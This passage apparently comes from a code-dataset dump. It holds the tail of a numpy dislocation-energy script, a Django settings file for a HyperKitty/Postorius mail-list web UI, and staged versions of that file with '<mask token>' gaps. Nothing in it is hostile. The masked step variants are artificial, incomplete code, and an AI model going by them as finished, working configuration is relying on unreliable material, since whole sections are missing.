dot(cross(b1, b2), cross(xi1, xi2)) + dot(b1,\n xi1) * dot(b2, xi2)) * (Iab + a ** 2 / 2 * Jab) + MU / 4 / pi / (1 - NU\n ) * Tab\n\n\ndef enginteract(MU, NU, b1, b2, r1, r2, r3, r4, a):\n r21 = r2 - r1\n r43 = r4 - r3\n r31 = r3 - r1\n e1 = r21 / norm(r21)\n e2 = r43 / norm(r43)\n e3 = cross(e1, e2)\n subzero = 1e-10\n if norm(e3) < subzero:\n e2a = schmidt(r31, e1)\n e3 = cross(e1, e2a)\n e3 = e3 / norm(e3)\n eta = (dot(r3 - r1, e2a) + dot(r4 - r1, e2a)) / 2\n x1 = 0\n x2 = dot(r2 - r1, e1)\n y1 = dot(r3 - r1, e1)\n y2 = dot(r4 - r1, e1)\n b1n = zeros([3, 1])\n b2n = zeros([3, 1])\n b1n[0], b2n[0] = dot(b1, e1), dot(b2, e1)\n b1n[1], b2n[1] = dot(b1, e2a), dot(b2, e2a)\n b1n[2], b2n[2] = dot(b1, e3), dot(b2, e3)\n return engparallelb2(MU, NU, b1n, b2n, x1, x2, y1, y2, eta, a)\n else:\n costheta = dot(e1, e2)\n e3 = e3 / norm(e3)\n e2a = cross(e3, e1)\n z = dot(r31, e3)\n z = -z\n A = zeros([2, 2])\n A[0, 0], A[0, 1] = dot(r21, e1), -dot(r43, e1)\n A[1, 0], A[1, 1] = dot(r21, e2a), -dot(r43, e2a)\n rhs = zeros([2, 1])\n rhs[0], rhs[1] = dot(r31, e1), dot(r31, e2a)\n t = linalg.solve(A, rhs)\n r0 = (1 - t[0]) * r1 + t[0] * r2\n x1 = dot(r1 - r0, e1)\n x2 = dot(r2 - r0, e1)\n y1 = dot(r3 - r0, e2)\n y2 = dot(r4 - r0, e2)\n return engnonplanarb2(MU, NU, b1, b2, e1, e2, e3, costheta, x1, x2,\n y1, y2, z, a)\n",
"step-5": "from numpy import pi,sqrt,cross,dot,zeros,linalg\n\nfrom defs import *\n##from numba import njit, prange\n##\n##@njit(parallel=True)\n\n\ndef engparallelb2(MU,NU,b1,b2,x1,x2,y1,y2,eta,a):\n\n#For use in enginteract below\n#HL p.154 Eq.(6-45)\n\n b1x=b1[0]\n b1y=b1[1]\n b1z=b1[2]\n\n b2x=b2[0]\n b2y=b2[1]\n b2z=b2[2]\n\n Rab=Rp(x2,y2,eta,a)-Rp(x2,y1,eta,a)-Rp(x1,y2,eta,a)+Rp(x1,y1,eta,a)\n\n #[b1',b2',x1,x2,y1,y2,eta,a,Rab]\n #b1\n\n ap=sqrt(eta**2+a**2)\n Iab=Ia(x2,y2,1,ap)-Ia(x2,y1,1,ap)-Ia(x1,y2,1,ap)+Ia(x1,y1,1,ap)\n Jab=Ja(x2,y2,1,ap)-Ja(x2,y1,1,ap)-Ja(x1,y2,1,ap)+Ja(x1,y1,1,ap)\n\n\n\n return MU/4/pi*(b1x*b2x+(b1z*b2z+b1y*b2y)/(1-NU))*Iab \\\n + MU/4/pi*(b1x*b2x)*(a**2/2)*Jab \\\n - MU/4/pi/(1-NU)*b1z*b2z*eta*eta*Jab\n\n\n\ndef engnonplanarb2(MU,NU,b1,b2,xi1,xi2,e3,costheta,x1,x2,y1,y2,z,a):\n\n#For use in enginteract below\n\n#\n# ^ y axis\n# /\n# -\n# y /\n# / theta\n# ---------------|----------------> x axis\n# x\n#\n# x>0, y>0 HL p152, Eq.(6-33)\n\n ap=sqrt(z*z+a*a)\n\n Iab = Ia(x2,y2,costheta,ap)-Ia(x2,y1,costheta,ap)-Ia(x1,y2,costheta,ap)+Ia(x1,y1,costheta,ap)\n Jab = Ja(x2,y2,costheta,ap)-Ja(x2,y1,costheta,ap)-Ja(x1,y2,costheta,ap)+Ja(x1,y1,costheta,ap)\n\n Tab = ( Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y2,z,a)\n - Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y1,z,a)\n - Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y2,z,a)\n + Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y1,z,a) )\n\n return ( MU/4/pi*(-2*dot(cross(b1,b2),cross(xi1,xi2))\n + dot(b1,xi1)*dot(b2,xi2) )*(Iab+a**2/2*Jab)\n + MU/4/pi/(1-NU)*Tab )\n\n#When Iab incorporates Jab\n#W = ( MU/4/pi* (-2*dot(cross(b1,b2),cross(xi1,xi2)) + dot(b1,xi1)*dot(b2,xi2) )*(Iab)\n# + MU/4/pi/(1-NU)* Tab )\n\n\n\ndef enginteract(MU,NU,b1,b2,r1,r2,r3,r4,a):\n\n\n#Computes interaction energy between two straight dislocation segments\n#r1-r2 (Burgers vector b1) and r3-r4 (Burgers vector b2)\n#MU is shear modulus, NU is Poisson ratio, a is core spread radius\n\n\n r21=r2-r1\n r43=r4-r3\n r31=r3-r1\n\n\n#Make sure that the segments are represented by column vectors\n\n #if r21.shape[0]==1:\n #r21=r21.T\n #if r43.shape[0]==1:\n #r43=r43.T\n #if r31.shape[0]==1:\n #r31=r31.T\n\n\n#Segment line sense unit vectors \n\n e1=r21/norm(r21)\n e2=r43/norm(r43)\n\n\n#Catagorise line segments according to whether they are parallel or not\n\n e3=cross(e1,e2)\n subzero=1e-10\n\n if norm(e3)<subzero:\n e2a=schmidt(r31,e1)\n e3=cross(e1,e2a)\n e3=e3/norm(e3)\n eta=(dot(r3-r1,e2a)+dot(r4-r1,e2a))/2\n x1=0\n x2=dot(r2-r1,e1)\n y1=dot(r3-r1,e1)\n y2=dot(r4-r1,e1)\n#engparallelb2 doesn't rotate b, it needs to be done here\n b1n=zeros([3,1])\n b2n=zeros([3,1])\n b1n[0],b2n[0]=dot(b1,e1),dot(b2,e1)\n b1n[1],b2n[1]=dot(b1,e2a),dot(b2,e2a)\n b1n[2],b2n[2]=dot(b1,e3),dot(b2,e3)\n return engparallelb2(MU,NU,b1n,b2n,x1,x2,y1,y2,eta,a)\n else:\n costheta=dot(e1,e2)\n e3=e3/norm(e3)\n e2a=cross(e3,e1)\n z=dot(r31,e3) \n z=-z\n A=zeros([2,2])\n A[0,0],A[0,1]=dot(r21,e1),-dot(r43,e1)\n A[1,0],A[1,1]=dot(r21,e2a),-dot(r43,e2a)\n rhs=zeros([2,1])\n rhs[0],rhs[1]=dot(r31,e1),dot(r31,e2a)\n t=linalg.solve(A,rhs)\n r0=(1-t[0])*r1+t[0]*r2\n x1=dot(r1-r0,e1)\n x2=dot(r2-r0,e1)\n y1=dot(r3-r0,e2)\n y2=dot(r4-r0,e2)\n return engnonplanarb2(MU,NU,b1,b2,e1,e2,e3,costheta,x1,x2,y1,y2,z,a)\n \n \n \n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#-*- coding: utf-8 -*-
"""
Django settings for HyperKitty + Postorius
Pay attention to settings ALLOWED_HOSTS and DATABASES!
"""
from os.path import abspath, dirname, join as joinpath
from ConfigParser import SafeConfigParser
def read_cfg(path, section=None, option=None):
config = SafeConfigParser()
config.read(path)
def get(section, option):
return config.get(section, option) if config.has_option(section, option) else None
return get(section, option) if section else get
mailman_cfg = read_cfg('/etc/mailman.cfg')
BASE_DIR = '/usr/lib/bundles/mailman-webui'
CONF_DIR = '/etc/mailman-webui'
DATA_DIR = '/var/lib/mailman-webui'
LOG_DIR = '/var/log/mailman-webui'
# Hosts/domain names that are valid for this site.
# NOTE: You MUST add domain name of your instance of this application here!
# See https://docs.djangoproject.com/en/1.9/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['localhost']
# Mailman API credentials
# NOTE: Replace with hard-coded values if Mailman is running on a different host.
MAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice', 'port') or 8001)
MAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'
MAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')
MAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general', 'api_key')
MAILMAN_ARCHIVER_FROM = ('127.0.0.1', '::1', '::ffff:127.0.0.1')
# REST API
REST_FRAMEWORK = {
'PAGE_SIZE': 10,
}
# Only display mailing-lists in HyperKitty from the same virtual host
# as the webserver.
FILTER_VHOST = False
#
# Application definition
#
SITE_ID = 1
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'hyperkitty',
'rest_framework',
'django_gravatar',
'paintstore',
'compressor',
'haystack',
'django_extensions',
'postorius',
'django_mailman3',
'stronghold',
# Uncomment the next line to enable integration with Sentry
# and set DSN in RAVEN_CONFIG.
#'raven.contrib.django.raven_compat',
'allauth',
'allauth.account',
'allauth.socialaccount',
# Uncomment providers that you want to use, if any.
#'allauth.socialaccount.providers.openid',
#'allauth.socialaccount.providers.github',
#'allauth.socialaccount.providers.gitlab',
#'allauth.socialaccount.providers.google',
#'allauth.socialaccount.providers.twitter',
#'allauth.socialaccount.providers.stackexchange',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django_mailman3.middleware.TimezoneMiddleware',
'postorius.middleware.PostoriusMiddleware',
# Uncomment to require a user to be authenticated to view any page.
#'stronghold.middleware.LoginRequiredMiddleware',
)
# A string representing the full Python import path to your root URLconf.
ROOT_URLCONF = 'urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# Directory for templates override.
joinpath(DATA_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.template.context_processors.csrf',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django_mailman3.context_processors.common',
'hyperkitty.context_processors.common',
'postorius.context_processors.postorius',
],
},
},
]
WSGI_APPLICATION = 'wsgi.application'
# Using the cache infrastructure can significantly improve performance on a
# production setup. This is an example with a local Memcached server.
#CACHES = {
# 'default': {
# 'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',
# 'LOCATION': '127.0.0.1:11211',
# }
#}
#
# Databases
# See https://docs.djangoproject.com/en/1.9/ref/settings/#databases
#
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': joinpath(DATA_DIR, 'db.sqlite3'),
}
# Remove the above lines and uncomment the below to use PostgreSQL.
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': 'mailman_webui',
# 'USER': 'mailman_webui',
# 'PASSWORD': 'change-me',
# # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
# 'HOST': '127.0.0.1',
# 'PORT': '',
# }
}
# Full-text search engine
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': joinpath(DATA_DIR, 'fulltext_index'),
},
}
#
# Outgoing mails
#
# NOTE: Replace with hard-coded values if Mailman is running on a different host.
# The host and port of the SMTP server to use for sending email.
EMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'
EMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)
# Username and password to use for the SMTP server defined above.
EMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''
EMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''
# Whether to use a explicit TLS connection when talking to the SMTP server.
EMAIL_USE_TLS = False
# Whether to use an implicit TLS connection when talking to the SMTP server.
EMAIL_USE_SSL = False
# A tuple that lists people who get code error notifications. When DEBUG=False
# and a view raises an exception, Django will email these people with the full
# exception information. Each member of the tuple should be a tuple of (Full
# name, email address).
ADMINS = (
('Mailman Admin', 'root@localhost'),
)
# If you enable email reporting for error messages, this is where those emails
# will appear to be coming from. Make sure you set a valid domain name,
# otherwise the emails may get rejected.
# https://docs.djangoproject.com/en/1.9/ref/settings/#std:setting-SERVER_EMAIL
#SERVER_EMAIL = '[email protected]'
# If you enable internal authentication, this is the address that the emails
# will appear to be coming from. Make sure you set a valid domain name,
# otherwise the emails may get rejected.
# https://docs.djangoproject.com/en/1.9/ref/settings/#default-from-email
#DEFAULT_FROM_EMAIL = '[email protected]'
#
# Security settings
#
# A secret key used for signing sessions, cookies, password reset tokens etc.
SECRET_KEY = open(joinpath(CONF_DIR, 'secret_key')).read()
CSRF_COOKIE_SECURE = True
CSRF_COOKIE_HTTPONLY = True
SESSION_COOKIE_SECURE = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
X_FRAME_OPTIONS = 'DENY'
# If you're behind a proxy, use the X-Forwarded-Host header
# See https://docs.djangoproject.com/en/1.9/ref/settings/#use-x-forwarded-host
USE_X_FORWARDED_HOST = True
# And if your proxy does your SSL encoding for you, set SECURE_PROXY_SSL_HEADER
# https://docs.djangoproject.com/en/1.9/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
#SECURE_SSL_REDIRECT = True
# If you set SECURE_SSL_REDIRECT to True, make sure the SECURE_REDIRECT_EXEMPT
# contains at least this line:
#SECURE_REDIRECT_EXEMPT = [
# 'archives/api/mailman/.*', # Request from Mailman.
#]
#
# Authentication
#
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
# Uncomment to next line to enable LDAP authentication.
#'custom.LDAPBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
LOGIN_URL = 'account_login'
LOGIN_REDIRECT_URL = 'hk_root'
LOGOUT_URL = 'account_logout'
# Whether registration of new accounts is currently permitted.
REGISTRATION_OPEN = True
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{ 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator' },
{ 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator' },
{ 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator' },
{ 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator' },
]
# URLs which are ignored by LoginRequiredMiddleware, i.e. the middleware
# does not *force* them to require authentication.
STRONGHOLD_PUBLIC_URLS = (
r'^/accounts/.*',
r'^/archives/api/mailman/.*',
)
## Django Allauth
# Custom AccountAdapter for allauth that respects REGISTRATION_OPEN variable.
ACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'
ACCOUNT_UNIQUE_EMAIL = True
# Whether to disable intermediate logout page.
ACCOUNT_LOGOUT_ON_GET = False
SOCIALACCOUNT_PROVIDERS = {}
#SOCIALACCOUNT_PROVIDERS = {
# 'openid': {
# 'SERVERS': [
# {
# 'id': 'yahoo',
# 'name': 'Yahoo',
# 'openid_url': 'http://me.yahoo.com'
# }
# ],
# },
# 'google': {
# 'SCOPE': ['profile', 'email'],
# 'AUTH_PARAMS': {'access_type': 'online'},
# },
# 'facebook': {
# 'METHOD': 'oauth2',
# 'SCOPE': ['email'],
# 'FIELDS': [
# 'email',
# 'name',
# 'first_name',
# 'last_name',
# 'locale',
# 'timezone',
# ],
# 'VERSION': 'v2.4',
# },
#}
## Django LDAP
if 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:
import ldap
from django_auth_ldap.config import LDAPSearch
ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')
AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'
AUTH_LDAP_USER_SEARCH = LDAPSearch(
'ou=People,dc=example,dc=org',
ldap.SCOPE_SUBTREE,
'(&(mail=*)(uid=%(user)s))'
)
AUTH_LDAP_USER_ATTR_MAP = {
'first_name': 'givenName',
'last_name': 'sn',
'email': 'mail',
}
#
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
#
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
#
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = joinpath(BASE_DIR, 'static')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static".
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# django-compressor
COMPRESS_OFFLINE = True
# Compatibility with Bootstrap 3
from django.contrib.messages import constants as messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
#
# Gravatar
# https://github.com/twaddington/django-gravatar
#
# Gravatar base url.
GRAVATAR_URL = 'http://cdn.libravatar.org/'
# Gravatar base secure https url.
GRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'
# Gravatar size in pixels.
#GRAVATAR_DEFAULT_SIZE = '80'
# An image url or one of the following: 'mm', 'identicon', 'monsterid', 'wavatar', 'retro'.
GRAVATAR_DEFAULT_IMAGE = 'retro'
# One of the following: 'g', 'pg', 'r', 'x'.
#GRAVATAR_DEFAULT_RATING = 'g'
# True to use https by default, False for plain http.
GRAVATAR_DEFAULT_SECURE = True
#
# Logging
#
# A sample logging configuration. The only tangible logging performed by this
# configuration is to send an email to the site admins on every HTTP 500 error
# when DEBUG=False. See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple',
},
'file':{
'level': 'INFO',
#'class': 'logging.handlers.RotatingFileHandler',
'class': 'logging.handlers.WatchedFileHandler',
'filename': joinpath(LOG_DIR, 'mailman-webui.log'),
'formatter': 'verbose',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
},
'loggers': {
#'django.request': {
# 'handlers': ['mail_admins'],
# 'level': 'ERROR',
# 'propagate': True,
#},
'django.request': {
'handlers': ['file'],
'level': 'ERROR',
'propagate': True,
},
'django': {
'handlers': ['file'],
'level': 'ERROR',
'propagate': True,
},
'postorius': {
'handlers': ['file'],
'level': 'INFO',
'propagate': True,
},
'hyperkitty': {
'handlers': ['file'],
'level': 'INFO',
'propagate': True,
},
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'root': {
'handlers': ['file'],
'level': 'INFO',
},
}
if 'raven.contrib.django.raven_compat' in INSTALLED_APPS:
RAVEN_CONFIG = {
'dsn': 'https://<key>:<secret>@sentry.io/<project>',
}
LOGGING['handlers']['sentry'] = {
'level': 'ERROR',
'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
}
LOGGING['loggers']['root']['handlers'].append('sentry')
try:
from settings_local import *
except ImportError:
pass
|
normal
|
{
"blob_id": "0dd17d8872b251fbc59a322bf3c695bd8079aba4",
"index": 3338,
"step-1": "<mask token>\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\n<mask token>\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n AUTH_LDAP_USER_SEARCH = LDAPSearch('ou=People,dc=example,dc=org', ldap.\n SCOPE_SUBTREE, '(&(mail=*)(uid=%(user)s))')\n AUTH_LDAP_USER_ATTR_MAP = {'first_name': 'givenName', 'last_name': 'sn',\n 'email': 'mail'}\n<mask token>\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n RAVEN_CONFIG = {'dsn': 'https://<key>:<secret>@sentry.io/<project>'}\n LOGGING['handlers']['sentry'] = {'level': 'ERROR', 'class':\n 'raven.contrib.django.raven_compat.handlers.SentryHandler'}\n LOGGING['loggers']['root']['handlers'].append('sentry')\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
"step-3": "<mask token>\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\nmailman_cfg = read_cfg('/etc/mailman.cfg')\nBASE_DIR = '/usr/lib/bundles/mailman-webui'\nCONF_DIR = '/etc/mailman-webui'\nDATA_DIR = '/var/lib/mailman-webui'\nLOG_DIR = '/var/log/mailman-webui'\nALLOWED_HOSTS = ['localhost']\nMAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice',\n 'port') or 8001)\nMAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'\nMAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')\nMAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general',\n 'api_key')\nMAILMAN_ARCHIVER_FROM = '127.0.0.1', '::1', '::ffff:127.0.0.1'\nREST_FRAMEWORK = {'PAGE_SIZE': 10}\nFILTER_VHOST = False\nSITE_ID = 1\nINSTALLED_APPS = ('django.contrib.admin', 'django.contrib.auth',\n 'django.contrib.contenttypes', 'django.contrib.sessions',\n 'django.contrib.sites', 'django.contrib.messages',\n 'django.contrib.staticfiles', 'hyperkitty', 'rest_framework',\n 'django_gravatar', 'paintstore', 'compressor', 'haystack',\n 'django_extensions', 'postorius', 'django_mailman3', 'stronghold',\n 'allauth', 'allauth.account', 'allauth.socialaccount')\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django_mailman3.middleware.TimezoneMiddleware',\n 'postorius.middleware.PostoriusMiddleware')\nROOT_URLCONF = 'urls'\nTEMPLATES = [{'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [joinpath(DATA_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS':\n {'context_processors': ['django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.csrf',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django_mailman3.context_processors.common',\n 'hyperkitty.context_processors.common',\n 'postorius.context_processors.postorius']}}]\nWSGI_APPLICATION = 'wsgi.application'\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME':\n joinpath(DATA_DIR, 'db.sqlite3')}}\nHAYSTACK_CONNECTIONS = {'default': {'ENGINE':\n 'haystack.backends.whoosh_backend.WhooshEngine', 'PATH': joinpath(\n DATA_DIR, 'fulltext_index')}}\nEMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'\nEMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)\nEMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''\nEMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = False\nADMINS = ('Mailman Admin', 'root@localhost'),\nSECRET_KEY = open(joinpath(CONF_DIR, 'secret_key')).read()\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = True\nSESSION_COOKIE_SECURE = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nX_FRAME_OPTIONS = 'DENY'\nUSE_X_FORWARDED_HOST = True\nSECURE_PROXY_SSL_HEADER = 'HTTP_X_FORWARDED_PROTO', 'https'\nAUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend')\nLOGIN_URL = 'account_login'\nLOGIN_REDIRECT_URL = 'hk_root'\nLOGOUT_URL = 'account_logout'\nREGISTRATION_OPEN = True\nAUTH_PASSWORD_VALIDATORS = [{'NAME':\n 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'\n }, {'NAME':\n 'django.contrib.auth.password_validation.MinimumLengthValidator'}, {\n 'NAME':\n 'django.contrib.auth.password_validation.CommonPasswordValidator'}, {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}\n ]\nSTRONGHOLD_PUBLIC_URLS = '^/accounts/.*', '^/archives/api/mailman/.*'\nACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_LOGOUT_ON_GET = False\nSOCIALACCOUNT_PROVIDERS = {}\nif 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:\n import ldap\n from django_auth_ldap.config import LDAPSearch\n ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')\n AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'\n AUTH_LDAP_USER_SEARCH = LDAPSearch('ou=People,dc=example,dc=org', ldap.\n SCOPE_SUBTREE, '(&(mail=*)(uid=%(user)s))')\n AUTH_LDAP_USER_ATTR_MAP = {'first_name': 'givenName', 'last_name': 'sn',\n 'email': 'mail'}\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_ROOT = joinpath(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder')\nCOMPRESS_OFFLINE = True\n<mask token>\nMESSAGE_TAGS = {messages.ERROR: 'danger'}\nGRAVATAR_URL = 'http://cdn.libravatar.org/'\nGRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'\nGRAVATAR_DEFAULT_IMAGE = 'retro'\nGRAVATAR_DEFAULT_SECURE = True\nLOGGING = {'version': 1, 'disable_existing_loggers': False, 'filters': {\n 'require_debug_false': {'()': 'django.utils.log.RequireDebugFalse'}},\n 'handlers': {'console': {'class': 'logging.StreamHandler', 'formatter':\n 'simple'}, 'file': {'level': 'INFO', 'class':\n 'logging.handlers.WatchedFileHandler', 'filename': joinpath(LOG_DIR,\n 'mailman-webui.log'), 'formatter': 'verbose'}, 'mail_admins': {'level':\n 'ERROR', 'filters': ['require_debug_false'], 'class':\n 'django.utils.log.AdminEmailHandler'}}, 'loggers': {'django.request': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'django': {\n 'handlers': ['file'], 'level': 'ERROR', 'propagate': True}, 'postorius':\n {'handlers': ['file'], 'level': 'INFO', 'propagate': True},\n 'hyperkitty': {'handlers': ['file'], 'level': 'INFO', 'propagate': True\n }}, 'formatters': {'verbose': {'format':\n '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n }, 'simple': {'format': '%(levelname)s %(message)s'}}, 'root': {\n 'handlers': ['file'], 'level': 'INFO'}}\nif 'raven.contrib.django.raven_compat' in INSTALLED_APPS:\n RAVEN_CONFIG = {'dsn': 'https://<key>:<secret>@sentry.io/<project>'}\n LOGGING['handlers']['sentry'] = {'level': 'ERROR', 'class':\n 'raven.contrib.django.raven_compat.handlers.SentryHandler'}\n LOGGING['loggers']['root']['handlers'].append('sentry')\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n",
